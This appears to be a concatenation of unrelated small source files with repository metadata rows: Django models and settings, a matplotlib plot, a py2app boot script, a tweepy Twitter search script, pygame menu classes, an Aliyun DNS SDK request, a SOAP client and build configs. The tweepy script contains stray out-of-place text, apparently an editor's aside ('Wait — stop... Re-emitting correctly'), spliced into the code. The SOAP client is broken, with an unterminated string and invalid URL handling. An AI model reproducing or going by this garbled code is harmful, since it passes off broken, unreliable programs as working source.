                ('appointment_state', models.CharField(choices=[('appoint', '预约'), ('completed', '已完成')], max_length=10)),
                ('doctor', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='users.Doctor')),
                ('guardian', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='users.Guardian')),
                ('patient', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='users.Patient')),
            ],
            options={
                'db_table': 'appointment',
                'unique_together': {('patient', 'doctor', 'guardian', 'appointment_time')},
            },
        ),
    ]
| [
"[email protected]"
] | |
a3d39c7cacd05406c589fa1898cdea4bc0e3e49a | 51c57fd203d75d70dea31ae9816f45b046411261 | /simple_vect_field/vector_field.py | 7585eedd34b24cc4d35d4e4a006e6893f131256a | [] | no_license | HoughGrant/matplotlib_art | 376642410afd1737583aa8ef1ca7f6e144b3babd | 6722f2a7906d190390ab7bbc29a5ea5237bcb0fb | refs/heads/main | 2023-06-25T21:06:19.118253 | 2021-07-26T01:51:36 | 2021-07-26T01:51:36 | 335,814,007 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,482 | py | import matplotlib.pyplot as plt
import numpy as np
def run_1():
    """Integrate ten particle paths through a fixed 2-D velocity field with
    forward-Euler steps and scatter-plot every trajectory."""

    def field_x(px, py):
        """x-component of the velocity field at (px, py)."""
        return -py ** 2 - 5 * py + 0.2 * px * py ** 3

    def field_y(px, py):
        """y-component of the velocity field at (px, py)."""
        return -px ** 2 + 2 * px + 5 * py * px

    def advance(pt, dt):
        """One forward-Euler step of size dt from point pt."""
        return (pt[0] + field_x(*pt) * dt, pt[1] + field_y(*pt) * dt)

    def trace(start, steps, dt):
        """Return the whole trajectory from start as a (steps + 1, 2) array."""
        trail = [start]
        for _ in range(steps):
            trail.append(advance(trail[-1], dt))
        return np.array(trail)

    plt.figure()
    origin = (0, 0)
    clusters = {}
    # Seed ten trajectories by nudging the origin diagonally by 0.1 .. 1.0.
    for idx, eps in enumerate(np.linspace(0.1, 1, 10)):
        seed = (origin[0] + eps, origin[1] + eps)
        trail = trace(seed, 100000, 0.01)
        clusters[idx] = trail
        plt.scatter(trail[:, 0], trail[:, 1])
    plt.show()
# plot vector field
if __name__ == '__main__':
    run_1()
| [
"[email protected]"
] | |
ca2956bc2eed953b908d3edf74589e6ded2436d9 | 90449f55230622e06c85bed858acbbde85b2f399 | /dist/suffer.app/Contents/Resources/__boot__.py | d17f1a81d0efc2a657313e2adfd05e84ce000918 | [] | no_license | jalovisko/SMeter | 1d5c5dcbeb9b824f961b3d35d5c36edda0b7bf8d | 3577c1eef37429051abbb70137cb67335a5a2601 | refs/heads/master | 2021-04-12T10:49:47.092091 | 2017-07-10T10:46:59 | 2017-07-10T10:46:59 | 94,534,643 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,251 | py | def _reset_sys_path():
# Clear generic sys.path[0]
import sys
import os
resources = os.environ['RESOURCEPATH']
while sys.path[0] == resources:
del sys.path[0]
_reset_sys_path()
def _site_packages():
import site
import sys
import os
paths = []
prefixes = [sys.prefix]
if sys.exec_prefix != sys.prefix:
prefixes.append(sys.exec_prefix)
for prefix in prefixes:
paths.append(
os.path.join(
prefix, 'lib', 'python' + sys.version[:3], 'site-packages'))
if os.path.join('.framework', '') in os.path.join(sys.prefix, ''):
home = os.environ.get('HOME')
if home:
# Sierra and later
paths.append(os.path.join(home, 'Library', 'Python',
sys.version[:3], 'lib', 'python',
'site-packages'))
# Before Sierra
paths.append(os.path.join(home, 'Library', 'Python',
sys.version[:3], 'site-packages'))
# Work around for a misfeature in setuptools: easy_install.pth places
# site-packages way to early on sys.path and that breaks py2app bundles.
# NOTE: this is hacks into an undocumented feature of setuptools and
# might stop to work without warning.
sys.__egginsert = len(sys.path)
for path in paths:
site.addsitedir(path)
_site_packages()
def _chdir_resource():
import os
os.chdir(os.environ['RESOURCEPATH'])
_chdir_resource()
def _setup_ctypes():
from ctypes.macholib import dyld
import os
frameworks = os.path.join(os.environ['RESOURCEPATH'], '..', 'Frameworks')
dyld.DEFAULT_FRAMEWORK_FALLBACK.insert(0, frameworks)
dyld.DEFAULT_LIBRARY_FALLBACK.insert(0, frameworks)
_setup_ctypes()
def _path_inject(paths):
import sys
sys.path[:0] = paths
_path_inject(['/Users/Nick/Google Drive/Skoltech/Summer Immersion/SMeter'])
import re
import sys
cookie_re = re.compile(b"coding[:=]\s*([-\w.]+)")
if sys.version_info[0] == 2:
default_encoding = 'ascii'
else:
default_encoding = 'utf-8'
def guess_encoding(fp):
for i in range(2):
ln = fp.readline()
m = cookie_re.search(ln)
if m is not None:
return m.group(1).decode('ascii')
return default_encoding
def _run():
global __file__
import os
import site # noqa: F401
sys.frozen = 'macosx_app'
argv0 = os.path.basename(os.environ['ARGVZERO'])
script = SCRIPT_MAP.get(argv0, DEFAULT_SCRIPT) # noqa: F821
sys.argv[0] = __file__ = script
if sys.version_info[0] == 2:
with open(script, 'rU') as fp:
source = fp.read() + "\n"
else:
with open(script, 'rb') as fp:
encoding = guess_encoding(fp)
with open(script, 'r', encoding=encoding) as fp:
source = fp.read() + '\n'
BOM = b'\xef\xbb\xbf'.decode('utf-8')
if source.startswith(BOM):
source = source[1:]
exec(compile(source, script, 'exec'), globals(), globals())
DEFAULT_SCRIPT='/Users/Nick/Google Drive/Skoltech/Summer Immersion/SMeter/suffer.py'
SCRIPT_MAP={}
try:
_run()
except KeyboardInterrupt:
pass
| [
"[email protected]"
] | |
9a1ebe0e49c72ca6b28bb08e32c90d03154eff35 | 40d2172ed25d7fce68e169eecc6c1155722b62b4 | /tweepy-statuses.py | fb95128bafda0b72e103dbe388f02de0f12b422f | [] | no_license | mortie23/twitter-twurl-csv | 51933bd59987602add3183d29bc379242d8ad4a0 | da51ce7376f155ddf5eaa2c41c1c50c648bbb3db | refs/heads/master | 2020-09-21T10:09:04.491949 | 2020-01-29T03:31:55 | 2020-01-29T03:31:55 | 224,760,984 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,560 | py | #!/usr/bin/python3
## Author: Christopher Mortimer
## Date: 2020-01-15
## Desc: Get all statuses based on a list of ids
## Depend: pip3 install tweepy --user
## pip3 install pandas --user
## pip3 install os --user
import sys
## Add the parent directory containing the auth files
sys.path.append('../')
import myAuth
import os
import pandas as pd
</source_numbered>

Wait — stop. I must not alter code order in a doc_update. Re-emitting correctly:
import tweepy as tw
#consumer_key='from myAuth file in parent directory'
#consumer_secret='from myAuth file in parent directory'
#access_token='from myAuth file in parent directory'
#access_token_secret='from myAuth file in parent directory'
auth = tw.OAuthHandler(myAuth.consumer_key, myAuth.consumer_secret)
auth.set_access_token(myAuth.access_token, myAuth.access_token_secret)
api = tw.API(auth, wait_on_rate_limit=True)
search_words = "@mortie23"
date_since = "2018-11-16"
# Collect tweets as object
tweets = tw.Cursor(api.search,q=search_words,lang="en",since=date_since).items(5)
# Iterate and print tweets
for i, tweet in enumerate(tweets):
    print(i,":\n")
    print(tweet.text)
print("\n\nNow without retweets\n\n")
## Get tweets without retweets
new_search = search_words + " -filter:retweets"
#print(new_search)
tweets = tw.Cursor(api.search,q=new_search,lang="en",since=date_since).items(10)
for i, tweet in enumerate(tweets):
    print(i,":\n")
    print(tweet.text)
#print(vars(tweets))
## User timeline
print("\n\nNow a timeline\n\n")
tweets = tw.Cursor(api.user_timeline, id="mortie23").items(10)
for i, tweet in enumerate(tweets):
    print(i,":\n")
    print(tweet.text)
"[email protected]"
] | |
a4179dd3d6f20a183b344f05c1d32a059c61e4a6 | c3eabffad6813a285ea1aa554ff05ef3e798bfa7 | /bubbleshoot/utils.py | d1690f1bba79a87551017310240add1a42ba2277 | [] | no_license | ranjian0/mini-games | 8a96eef730cffccd548cd70dee3349ad31502ba3 | 34bb48456ed6e3fc0d82a4c936e01c48bf0e8f47 | refs/heads/master | 2020-03-19T00:09:24.914583 | 2020-01-08T15:32:46 | 2020-01-08T15:32:46 | 135,455,396 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 9,516 | py | import os
import math, random
import pygame as pg
from pygame.sprite import *
# from player import Player
# from enemy import EnemySpawner
# Fully transparent RGBA colour used to clear sprite surfaces before drawing.
TRANSPARENT = (0, 0, 0, 0)
def random_pos(target, dist):
    """Return a random [x, y] on screen at least *dist* pixels from *target*.

    Rejection-samples positions padded 100 px away from the right/bottom
    screen edges.  Bug fix: the original recursed for every rejected sample,
    which can hit Python's recursion limit when *dist* is large relative to
    the screen; the loop below is behaviourally identical but iterative.
    """
    pad = 100
    max_ = pg.display.get_surface().get_size()
    while True:
        pos = [random.randint(0, n - pad) for n in max_]
        # Ensure the random point is more than dist away from target.
        offset = pg.math.Vector2(pos[0] - target[0], pos[1] - target[1])
        if offset.length() >= dist:
            return pos
def media_path(fn):
    """Return the absolute path of *fn* inside this package's media folder."""
    base_dir = os.path.dirname(__file__)
    return os.path.join(base_dir, "media", fn)
class Bullet(Sprite):
    """A small square projectile that flies in a straight line and kills
    itself once it leaves the screen."""

    def __init__(self, pos, angle, color=pg.Color("black")):
        Sprite.__init__(self)
        size = (5, 5)
        self.color = color
        self.image = self.make_image(size)
        self.rect = self.image.get_rect(center=pos)
        # Track position as floats; rect coordinates are ints only.
        self.true_pos = list(self.rect.center)
        # Convert the sprite's degree heading into screen-space radians.
        self.angle = -math.radians(angle - 90)
        self.speed = 5
    def make_image(self, size):
        """Build the bullet surface: a solid rect on a transparent background."""
        img = pg.Surface(size).convert_alpha()
        img.fill(TRANSPARENT)
        rect = img.get_rect()
        pg.draw.rect(img, self.color, [0, 0, size[0], size[1]])
        return img
    def update(self, dt):
        """Advance along the stored heading, then cull if off screen."""
        self.true_pos[0] += math.cos(self.angle) * self.speed
        self.true_pos[1] += math.sin(self.angle) * self.speed
        self.rect.topleft = self.true_pos
        self.remove()
    def remove(self):
        """Kill this sprite once it no longer intersects the screen.

        NOTE(review): this overrides pygame's Sprite.remove(*groups) with a
        different signature -- confirm nothing relies on the inherited API.
        """
        screen_rect = pg.display.get_surface().get_rect()
        if not self.rect.colliderect(screen_rect):
            self.kill()
class DamageBar(Sprite):
    """A health bar: black frame with a coloured fill proportional to the
    tracked sprite's health / max_health ratio."""

    def __init__(self, pos, size=(200, 25), color=pg.Color("green")):
        Sprite.__init__(self)
        self.size = size
        self.pos = pos
        self.color = color
        self.image = self.make_image(size)
        self.rect = self.image.get_rect(center=pos)
        self.true_pos = list(self.rect.center)
    def make_image(self, size, fill_percent=1):
        """Render the bar surface with the inner rect scaled by fill_percent."""
        img = pg.Surface(size).convert_alpha()
        img.fill(TRANSPARENT)
        rect = img.get_rect()
        pg.draw.rect(img, pg.Color("black"), rect)
        # Inner bar inset 5 px on every side, width scaled by fill level.
        rect2 = rect.inflate(-10, -10).copy()
        rect2.width *= fill_percent
        pg.draw.rect(img, self.color, rect2)
        return img
    def update(self, sprite):
        """Re-render from *sprite*'s current health / max_health attributes."""
        health_percent = sprite.health / sprite.max_health
        self.image = self.make_image(self.size, health_percent)
        self.rect = self.image.get_rect(center=self.rect.center)
class Option:
    """A single clickable menu label that renders white while hovered and
    grey otherwise."""
    # Class-level default; draw() callers toggle this per instance.
    hovered = False
    def __init__(self, text, pos, font):
        self.text = text
        self.pos = pos
        self.font = font
        self.set_rect()
        self.draw()
    def draw(self):
        """Re-render the label and blit it onto the current display surface."""
        self.set_rend()
        screen = pg.display.get_surface()
        screen.blit(self.rend, self.rect)
    def set_rend(self):
        # Rendered colour depends on the current hover state.
        self.rend = self.font.render(self.text, True, self.get_color())
    def get_color(self):
        """White when hovered, grey otherwise."""
        if self.hovered:
            return (255, 255, 255)
        else:
            return (100, 100, 100)
    def set_rect(self):
        """Compute the label's rect, centred on the configured position."""
        self.set_rend()
        self.rect = self.rend.get_rect()
        self.rect.center = self.pos
class MainMenu:
    """Main menu screen: title image plus PLAY GAME / CREDITS / EXIT options."""

    def __init__(self):
        self.font = pg.font.Font(None, 72)
        size = pg.display.get_surface().get_size()
        off_x = size[0] / 2
        off_y = size[1] / 2
        # Options stacked vertically around the screen centre.
        self.options = [
            Option("PLAY GAME", (off_x, off_y - 80), self.font),
            Option("CREDITS", (off_x, off_y), self.font),
            Option("EXIT", (off_x, off_y + 80), self.font),
        ]
        # Title image
        self.title = pg.image.load(media_path("title.png"))
        self.title_rect = self.title.get_rect(center=(off_x, 70))
    def draw(self, *args):
        """Draw the title and every option, updating hover highlighting."""
        # Draw title image
        screen = pg.display.get_surface()
        screen.blit(self.title, self.title_rect)
        # Draw Options
        for option in self.options:
            if option.rect.collidepoint(pg.mouse.get_pos()):
                option.hovered = True
            else:
                option.hovered = False
            option.draw()
    def on_mouse(self):
        """Return the text of the option under the cursor, or None."""
        for option in self.options:
            if option.rect.collidepoint(pg.mouse.get_pos()):
                return option.text
class Credits:
    """Credits screen: a block of text plus a BACK button."""

    def __init__(self):
        size = pg.display.get_surface().get_size()
        # Credits Text
        self._font = pg.font.Font(None, 30)
        self.text = """
        ESCAPE SHOOTER
        Author
        ````````
        Ian Ichung'wah Karanja
        Description
        `````````````
        This game was created between 1/5/17 and 3/5/17.
        The Player is challenged to kill enemies that are
        roaming about. Proximity to the enemies triggers an
        alert that causes them to chase and shoot at you.
        How many enemies can you kill before you die?
        Enjoy.
        """.lstrip()
        # Credits Back Button
        self.font = pg.font.Font(None, 72)
        # NOTE(review): pad_x is computed but never used; the BACK button is
        # placed at a fixed x of 100 below.
        pad_x = (size[0] - self.font.size("BACK")[0]) / 2
        self.options = [Option("BACK", (100, size[1] - 50), self.font)]
    def draw(self, *args):
        """Render each credits line horizontally centred, then the BACK button."""
        # Draw Credits Text
        screen = pg.display.get_surface()
        size = pg.display.get_surface().get_size()
        lines = self.text.splitlines()[1:]
        for idx, l in enumerate(lines):
            # Determine x padding
            l_size = self._font.size(l)[0]
            off_x = (size[0] - l_size) / 2
            screen.blit(
                self._font.render(l, True, (232, 122, 49)), (off_x, 10 + (idx * 30))
            )
        # Draw Back button
        for option in self.options:
            if option.rect.collidepoint(pg.mouse.get_pos()):
                option.hovered = True
            else:
                option.hovered = False
            option.draw()
    def on_mouse(self):
        """Return the text of the option under the cursor, or None."""
        for option in self.options:
            if option.rect.collidepoint(pg.mouse.get_pos()):
                return option.text
class GameOver:
    """Game-over screen: title image, kill-count message and
    RESTART / MAIN MENU / EXIT options."""

    def __init__(self):
        self.font = pg.font.Font(None, 72)
        self.size = pg.display.get_surface().get_size()
        off_x = self.size[0] / 2
        off_y = self.size[1] / 2
        self.options = [
            Option("RESTART", (off_x, self.size[1] - 250), self.font),
            Option("MAIN MENU", (off_x, self.size[1] - 150), self.font),
            Option("EXIT", (off_x, self.size[1] - 50), self.font),
        ]
        # Title image
        # NOTE(review): this duplicates the media_path() helper above, and
        # `file` shadows a builtin name -- consider reusing media_path().
        path = os.path.join(os.path.dirname(__file__), "media")
        file = "title.png"
        self.title = pg.image.load(os.path.join(path, file))
        self.title_rect = self.title.get_rect(center=(off_x, 70))
        # Enemies killed text
        # NOTE(review): self.font is re-assigned to an identical font here.
        self.font = pg.font.Font(None, 72)
    def draw(self, *args):
        """Draw title, the "<n> enemies killed" banner (args[0]) and options."""
        off_x = self.size[0] / 2
        off_y = self.size[1] / 2
        # Draw title image
        screen = pg.display.get_surface()
        screen.blit(self.title, self.title_rect)
        # Draw Killed text
        text = " {} enemies killed !".format(args[0])
        self.killed_text = self.font.render(text, True, (230, 0, 0))
        self.killed_rect = self.killed_text.get_rect(center=(off_x, off_y - 100))
        screen.blit(self.killed_text, self.killed_rect)
        for option in self.options:
            if option.rect.collidepoint(pg.mouse.get_pos()):
                option.hovered = True
            else:
                option.hovered = False
            option.draw()
    def on_mouse(self):
        """Return the text of the option under the cursor, or None."""
        for option in self.options:
            if option.rect.collidepoint(pg.mouse.get_pos()):
                return option.text
class PauseMenu:
    """Overlay shown while the game is paused: a centred "PAUSED" label."""

    def __init__(self):
        """Pre-render the label once; draw() only blits it."""
        width, height = pg.display.get_surface().get_size()
        self.font = pg.font.Font(None, 72)
        self.text_surf = self.font.render("PAUSED", True, (232, 122, 49))
        self.text_rect = self.text_surf.get_rect(center=(width / 2, height / 2))

    def draw(self, *args):
        """Blit the pre-rendered label onto the current display surface."""
        pg.display.get_surface().blit(self.text_surf, self.text_rect)
class MenuSystem:
    """Owns all menu screens and routes clicked options to state changes."""

    def __init__(self):
        self.active = True       # True while a menu (not the game) has control
        self.active_menu = 0     # index into self.menus
        self.menus = [MainMenu(), Credits(), GameOver(), PauseMenu()]
        # Game State
        self.quit = False        # set when the player picks EXIT
        pg.mixer.music.load(media_path("menu_loop.wav"))
        pg.mixer.music.play(-1, 0.0)

    def draw(self, *args):
        """Draw the active menu; extra args are forwarded (e.g. kill count)."""
        self.menus[self.active_menu].draw(*args)

    def on_mouse(self, reset_func):
        """Handle a click: ask the active menu which option was hit and act on it.

        reset_func restarts the game state (used by RESTART / MAIN MENU).
        """
        option = self.menus[self.active_menu].on_mouse()
        if option == "PLAY GAME":
            self.active = False
        elif option == "EXIT":
            self.quit = True
        elif option == "CREDITS":
            self.set_credits()
        elif option == "BACK":
            self.set_main()
        elif option == "RESTART":
            reset_func()
            pg.mixer.music.play(-1, 0.0)
            self.active = False
        elif option == "MAIN MENU":
            reset_func()
            self.set_main()

    def set_main(self):
        """Show the main menu and restart the menu music loop."""
        self.active_menu = 0
        pg.mixer.music.play(-1, 0.0)

    def set_credits(self):
        self.active_menu = 1

    def set_gameover(self):
        """Show the game-over screen; the menu music is stopped."""
        self.active_menu = 2
        pg.mixer.music.stop()

    def set_pause(self):
        self.active_menu = 3
| [
"[email protected]"
] | |
21190bb8e62dd782eafae6f70363d5471f54ebd4 | 39b35326534d6efa8a60344ef59eac3d8cea562f | /crudpj/crudpj/wsgi.py | b639603353b77ea9655595ff087206ea6ebb8995 | [] | no_license | Hyo-gyeong/Django_review | 8635e8311111cab56066c6b87429c7f57c5e42c3 | 8b59d717c0c8c4404230c8eaa42e6074cacdd712 | refs/heads/master | 2021-01-03T08:32:06.706689 | 2020-08-31T04:55:59 | 2020-08-31T04:55:59 | 240,000,924 | 0 | 0 | null | 2020-08-17T19:21:30 | 2020-02-12T11:53:19 | Python | UTF-8 | Python | false | false | 405 | py | """
WSGI config for crudpj project.
It exposes the WSGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/3.0/howto/deployment/wsgi/
"""
import os
from django.core.wsgi import get_wsgi_application
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'crudpj.settings')
application = get_wsgi_application()
| [
"[email protected]"
] | |
7bc9374380a24a79542e58d5423b623c5ffdaee6 | db3ba5776866f978fc2da97c8ac99ca3488a31dc | /production/orders/urls.py | c5c086fdc9bdfb0d1247a082bf8b77cd9ec40e00 | [] | no_license | barguello/AmpersandCopy | b7c2216f2ff4530e24f91233dc8332850a375988 | cc3e20960bf057d9101c3d4f0cac1b61bdef9089 | refs/heads/master | 2021-01-10T14:03:38.315929 | 2016-02-24T03:51:59 | 2016-02-24T03:51:59 | 52,412,200 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 232 | py | from django.conf.urls import patterns, url, include
import views
urlpatterns = patterns('',
url(r'^$', views.OrderFilterListView.as_view(), name="order_list"),
url(r'^import/$', views.order_import.as_view(), name="temp")
)
| [
"[email protected]"
] | |
591547196666ba74696882e924b9b0092ccb2e48 | b52a1091fbd167a060466b05d7b611f1a5ef24f9 | /SOAP.py | adbf0ae163111acb886bf5e977fde6e251bf99ae | [] | no_license | geoffreywestGIS/pythonscripts | 5cc765c1208e5ed61fe4c00645ee7a831751a3d3 | 50b1421999961441f9641ce3ee97880fe9eb5a0c | refs/heads/master | 2021-03-12T20:27:10.296344 | 2015-03-31T18:01:25 | 2015-03-31T18:01:25 | 32,751,541 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,106 | py | import string, os, sys
import httplib
server_addr = httplib. HTTPConnection('67.227.0.42/arcgis/services/FeatureMapService/MapServer/FeatureServer?wsdl:6080')
service_action = "/services?wsdl/GetServiceDescriptionsEx"
body = """
<soapenv:Envelope xmlns:soapenv="http://www.esri.com/schemas/ArcGIS/10.1" xmlns:ns="http://schemas.xmlsoap.org/wsdl/">
<soapenv:Header/>
<soapenv:Body>
<ns:GetServiceDescriptionsEx>
</ns:GetServiceDescriptionsEx>
</soapenv:Body>
</soapenv:Envelope>
request = httplib.HTTPConnection('67.227.0.42/arcgis/services/FeatureMapService/MapServer/FeatureServer?wsdl:6080')
request.putrequest("POST", service_action)
request.putheader("Accept", "application/soap+xml, application/dime, multipart/related, text/*")
request.putheader("Content-Type", "text/xml; charset=utf-8")
request.putheader("Cache-Control", "no-cache")
request.putheader("Pragma", "no-cache")
request.putheader("SOAPAction", "http://" + server_addr + service_action)
request.putheader("Content-Length", str(len(body)))
request.endheaders()
request.send(body)
response = request.getresponse().read()
print response | [
"[email protected]"
] | |
9d45a3bb593edb5c2ffcac2a4fb25732dd6a03a8 | c3d82f3e13dcb72446257694d2f2828a903d11d3 | /final2/users/admin.py | 531b6e8780ab5acf77f0ae73bdc14d3e4e879fd8 | [] | no_license | danielchain3/Hotdog-Not-Hotdog | 610de58842a9df5531906a7f391a5d2f8a1e4949 | 986bb253f86e22059886d8cc400ce02d674b32e3 | refs/heads/master | 2022-12-18T04:17:32.805173 | 2019-12-16T00:47:29 | 2019-12-16T00:47:29 | 225,662,289 | 0 | 1 | null | 2022-12-08T03:18:17 | 2019-12-03T16:09:19 | Python | UTF-8 | Python | false | false | 447 | py | from django.contrib import admin
from django.contrib.auth import get_user_model
from django.contrib.auth.admin import UserAdmin
from .forms import CustomUserCreationForm, CustomUserChangeForm
from .models import CustomUser
class CustomUserAdmin(UserAdmin):
add_form = CustomUserCreationForm
form = CustomUserChangeForm
model = CustomUser
list_display = ['email', 'username','id']
admin.site.register(CustomUser, CustomUserAdmin) | [
"[email protected]"
] | |
69902164ea9b3ea1f9ce378a4254075c62c0dac7 | bc0938b96b86d1396cb6b403742a9f8dbdb28e4c | /aliyun-python-sdk-alidns/aliyunsdkalidns/request/v20150109/DescribeDomainStatisticsRequest.py | 067b160a177535f3387786359d536dd3e134c0fa | [
"Apache-2.0"
] | permissive | jia-jerry/aliyun-openapi-python-sdk | fb14d825eb0770b874bc123746c2e45efaf64a6d | e90f3683a250cfec5b681b5f1d73a68f0dc9970d | refs/heads/master | 2022-11-16T05:20:03.515145 | 2020-07-10T08:45:41 | 2020-07-10T09:06:32 | 278,590,780 | 0 | 0 | NOASSERTION | 2020-07-10T09:15:19 | 2020-07-10T09:15:19 | null | UTF-8 | Python | false | false | 1,896 | py | # Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
#
# http://www.apache.org/licenses/LICENSE-2.0
#
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
from aliyunsdkcore.request import RpcRequest
from aliyunsdkalidns.endpoint import endpoint_data
class DescribeDomainStatisticsRequest(RpcRequest):
    """RPC request wrapper for Alidns ``DescribeDomainStatistics`` (API version 2015-01-09)."""

    def __init__(self):
        RpcRequest.__init__(self, 'Alidns', '2015-01-09', 'DescribeDomainStatistics','alidns')
        # Wire in endpoint resolution data when the SDK core exposes the hooks.
        if hasattr(self, "endpoint_map"):
            setattr(self, "endpoint_map", endpoint_data.getEndpointMap())
        if hasattr(self, "endpoint_regional"):
            setattr(self, "endpoint_regional", endpoint_data.getEndpointRegional())

    # Domain to query statistics for.
    def get_DomainName(self):
        return self.get_query_params().get('DomainName')

    def set_DomainName(self,DomainName):
        self.add_query_param('DomainName',DomainName)

    # Start of the statistics period.
    def get_StartDate(self):
        return self.get_query_params().get('StartDate')

    def set_StartDate(self,StartDate):
        self.add_query_param('StartDate',StartDate)

    # End of the statistics period.
    def get_EndDate(self):
        return self.get_query_params().get('EndDate')

    def set_EndDate(self,EndDate):
        self.add_query_param('EndDate',EndDate)

    # Response language.
    def get_Lang(self):
        return self.get_query_params().get('Lang')

    def set_Lang(self,Lang):
        self.add_query_param('Lang',Lang)
"[email protected]"
] | |
498e8a90ccaf27eae56b85de8b72e5e374d54131 | 7a333c69d854d86761a7581fffa1c16d73f12cb6 | /selenium/venv/bin/pip3 | 11404631f19763f89536808d54160c7b11a122ac | [] | no_license | chestnut-egg/selenium | f81ccbf0adbbf6101058a63ff4c7be755d2f6b3b | 5bdd914672e4ac90bed70eb3d5882f9697abb668 | refs/heads/master | 2020-06-02T07:55:16.997757 | 2019-06-10T03:27:31 | 2019-06-10T03:27:31 | 191,089,745 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 401 | #!/home/ppg/PycharmProjects/selenium/venv/bin/python
# EASY-INSTALL-ENTRY-SCRIPT: 'pip==19.0.3','console_scripts','pip3'
__requires__ = 'pip==19.0.3'
import re
import sys
from pkg_resources import load_entry_point
if __name__ == '__main__':
sys.argv[0] = re.sub(r'(-script\.pyw?|\.exe)?$', '', sys.argv[0])
sys.exit(
load_entry_point('pip==19.0.3', 'console_scripts', 'pip3')()
)
| [
"[email protected]"
] | ||
e2b58782ad188be442ae49e9a7cc718b463abe1a | 8b60b2b9946af0a441bde689a4c9e43f29fb40ac | /node_modules/browser-sync/node_modules/chokidar/node_modules/fsevents/build/config.gypi | b119c6204c99fc86f750da484afc9c1af3454abd | [
"MIT",
"Apache-2.0"
] | permissive | shura-sparrow/raketa | bf3a3e6cb535377351b8d08ea82adc418707721a | f44c1f143800197c7beb3b89702be48b7b6272f5 | refs/heads/master | 2020-06-05T10:17:02.592220 | 2015-09-08T20:41:37 | 2015-09-08T20:41:37 | 41,766,424 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,738 | gypi | # Do not edit. File was generated by node-gyp's "configure" step
{
"target_defaults": {
"cflags": [],
"default_configuration": "Release",
"defines": [],
"include_dirs": [],
"libraries": []
},
"variables": {
"clang": 1,
"host_arch": "x64",
"icu_data_file": "icudt54l.dat",
"icu_data_in": "../../deps/icu/source/data/in/icudt54l.dat",
"icu_endianness": "l",
"icu_gyp_path": "tools/icu/icu-generic.gyp",
"icu_locales": "en,root",
"icu_path": "./deps/icu",
"icu_small": "true",
"icu_ver_major": "54",
"node_install_npm": "true",
"node_prefix": "",
"node_shared_cares": "false",
"node_shared_http_parser": "false",
"node_shared_libuv": "false",
"node_shared_openssl": "false",
"node_shared_v8": "false",
"node_shared_zlib": "false",
"node_tag": "",
"node_use_dtrace": "true",
"node_use_etw": "false",
"node_use_mdb": "false",
"node_use_openssl": "true",
"node_use_perfctr": "false",
"openssl_no_asm": 0,
"python": "/usr/bin/python",
"target_arch": "x64",
"uv_library": "static_library",
"uv_parent_path": "/deps/uv/",
"uv_use_dtrace": "true",
"v8_enable_gdbjit": 0,
"v8_enable_i18n_support": 1,
"v8_no_strict_aliasing": 1,
"v8_optimized_debug": 0,
"v8_random_seed": 0,
"v8_use_snapshot": "false",
"want_separate_host_toolset": 0,
"nodedir": "/Users/shurasparrow/.node-gyp/0.12.0",
"copy_dev_lib": "true",
"standalone_static_library": 1,
"save_dev": "",
"browser": "",
"viewer": "man",
"rollback": "true",
"usage": "",
"globalignorefile": "/usr/local/etc/npmignore",
"init_author_url": "",
"shell": "/bin/bash",
"parseable": "",
"shrinkwrap": "true",
"init_license": "ISC",
"if_present": "",
"cache_max": "Infinity",
"init_author_email": "",
"sign_git_tag": "",
"cert": "",
"git_tag_version": "true",
"local_address": "",
"long": "",
"fetch_retries": "2",
"npat": "",
"registry": "https://registry.npmjs.org/",
"key": "",
"message": "%s",
"versions": "",
"globalconfig": "/usr/local/etc/npmrc",
"always_auth": "",
"spin": "true",
"cache_lock_retries": "10",
"cafile": "",
"heading": "npm",
"fetch_retry_mintimeout": "10000",
"proprietary_attribs": "true",
"access": "",
"json": "",
"description": "true",
"engine_strict": "",
"https_proxy": "",
"init_module": "/Users/shurasparrow/.npm-init.js",
"userconfig": "/Users/shurasparrow/.npmrc",
"node_version": "0.12.0",
"user": "",
"editor": "vi",
"save": "",
"tag": "latest",
"global": "",
"optional": "true",
"bin_links": "true",
"force": "",
"searchopts": "",
"depth": "Infinity",
"rebuild_bundle": "true",
"searchsort": "name",
"unicode": "true",
"fetch_retry_maxtimeout": "60000",
"ca": "",
"save_prefix": "^",
"strict_ssl": "true",
"tag_version_prefix": "v",
"dev": "",
"fetch_retry_factor": "10",
"group": "20",
"save_exact": "",
"cache_lock_stale": "60000",
"version": "",
"cache_min": "10",
"cache": "/Users/shurasparrow/.npm",
"searchexclude": "",
"color": "true",
"save_optional": "",
"user_agent": "npm/2.13.5 node/v0.12.0 darwin x64",
"ignore_scripts": "",
"cache_lock_wait": "10000",
"production": "",
"save_bundle": "",
"init_version": "1.0.0",
"umask": "0022",
"git": "git",
"init_author_name": "",
"scope": "",
"onload_script": "",
"tmp": "/var/folders/4n/gvf_pkbj2fb6zyby4xf6z7ph0000gp/T",
"unsafe_perm": "true",
"link": "",
"prefix": "/usr/local"
}
}
| [
"[email protected]"
] | |
